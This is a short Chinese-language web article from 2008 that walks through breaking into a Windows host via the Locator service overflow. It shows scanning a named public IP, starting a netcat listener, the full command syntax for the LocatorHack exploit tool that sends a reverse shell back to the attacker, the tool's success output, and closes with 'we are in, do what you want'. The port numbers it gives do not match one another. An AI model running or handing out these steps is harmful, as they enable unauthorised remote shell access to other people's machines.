利用locator漏洞入侵主机录象

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

本文是记录一次利用LOCATOR漏洞的入侵主机的全部过程!

首先利用扫描工具检测服务器的3268端口,看是否有此项服务!

这里我们用SUPER SCAN这个工具 [原因:比较小而且方便]

大家可见了 这台机子存在服务 211.167.146.250

好了

开始实战演练

首先要利用我们强大的NC [NET CAT] 来监听一个端口

格式如下: nc -vv -l -p 94 [94 是随便的可根据你的习惯更改 但是不要占用WIN的默认使用端就行]

然后进行溢出 并让漏洞机自动连接我们

这里我们利用sunx的LOCATORHACK这个溢出工具

其具体格式如下:

LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99

溢出程序名 -H 漏洞IP -V 主机类型 -l 主机语言 -S 应该是SP的版本

-R 本机IP - P 溢出后的端口[自主选择当然是要用和你监听的同一个端口]

好了由此的出我们这次的格式

好开始了

溢出后会看到如下结果

connect socket....

connect smb...

open namedpipe...

bind rpc...

call rpc...

Overflowed, 211.167.146.250:95

good luck

好了我们来看看刚才NC监听的CMD

呵呵

我们已经进去了!

接下来想干什么就有你决定了

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航